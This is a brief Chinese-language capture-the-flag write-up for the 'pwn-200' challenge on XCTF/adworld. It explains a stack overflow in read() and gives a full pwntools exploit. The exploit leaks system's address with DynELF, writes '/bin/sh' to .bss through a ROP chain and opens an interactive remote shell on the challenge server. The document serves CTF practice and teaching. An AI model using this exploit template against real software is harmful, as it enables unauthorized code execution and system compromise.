题目连接 https://adworld.xctf.org.cn/media/task/attachments/49bd95c78386423997fa044a9e750015
借鉴
https://www.cnblogs.com/deerCode/p/11919638.html
https://blog.csdn.net/qq_43986365/article/details/95752798
read存在栈溢出
没有libc,也没有后门函数可以直接调用
用DynELF泄露出system地址,在bss段写入/bin/sh,用pppt来调用read执行system
exp如下
from pwn import * r=remote('111.198.29.45',53833) elf=ELF('pwn-200') write_plt=elf.plt['write'] read_plt=elf.plt['read'] start_addr=0x80483d0 func_addr=0x08048484 ppp_addr=0x080485cd def leak(addr): payload1='a'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(addr)+p32(4) r.sendline(payload1) data=r.recv(4) return data print r.recv() d=DynELF(leak,elf=elf) sys_addr=d.lookup('system','libc') payload2='a'*112+p32(start_addr) r.sendline(payload2) print r.recv() bss_addr=elf.bss() payload3='a'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8) payload3+=p32(sys_addr)+p32(func_addr)+p32(bss_addr) r.sendline(payload3) r.sendline('/bin/sh') r.interactive()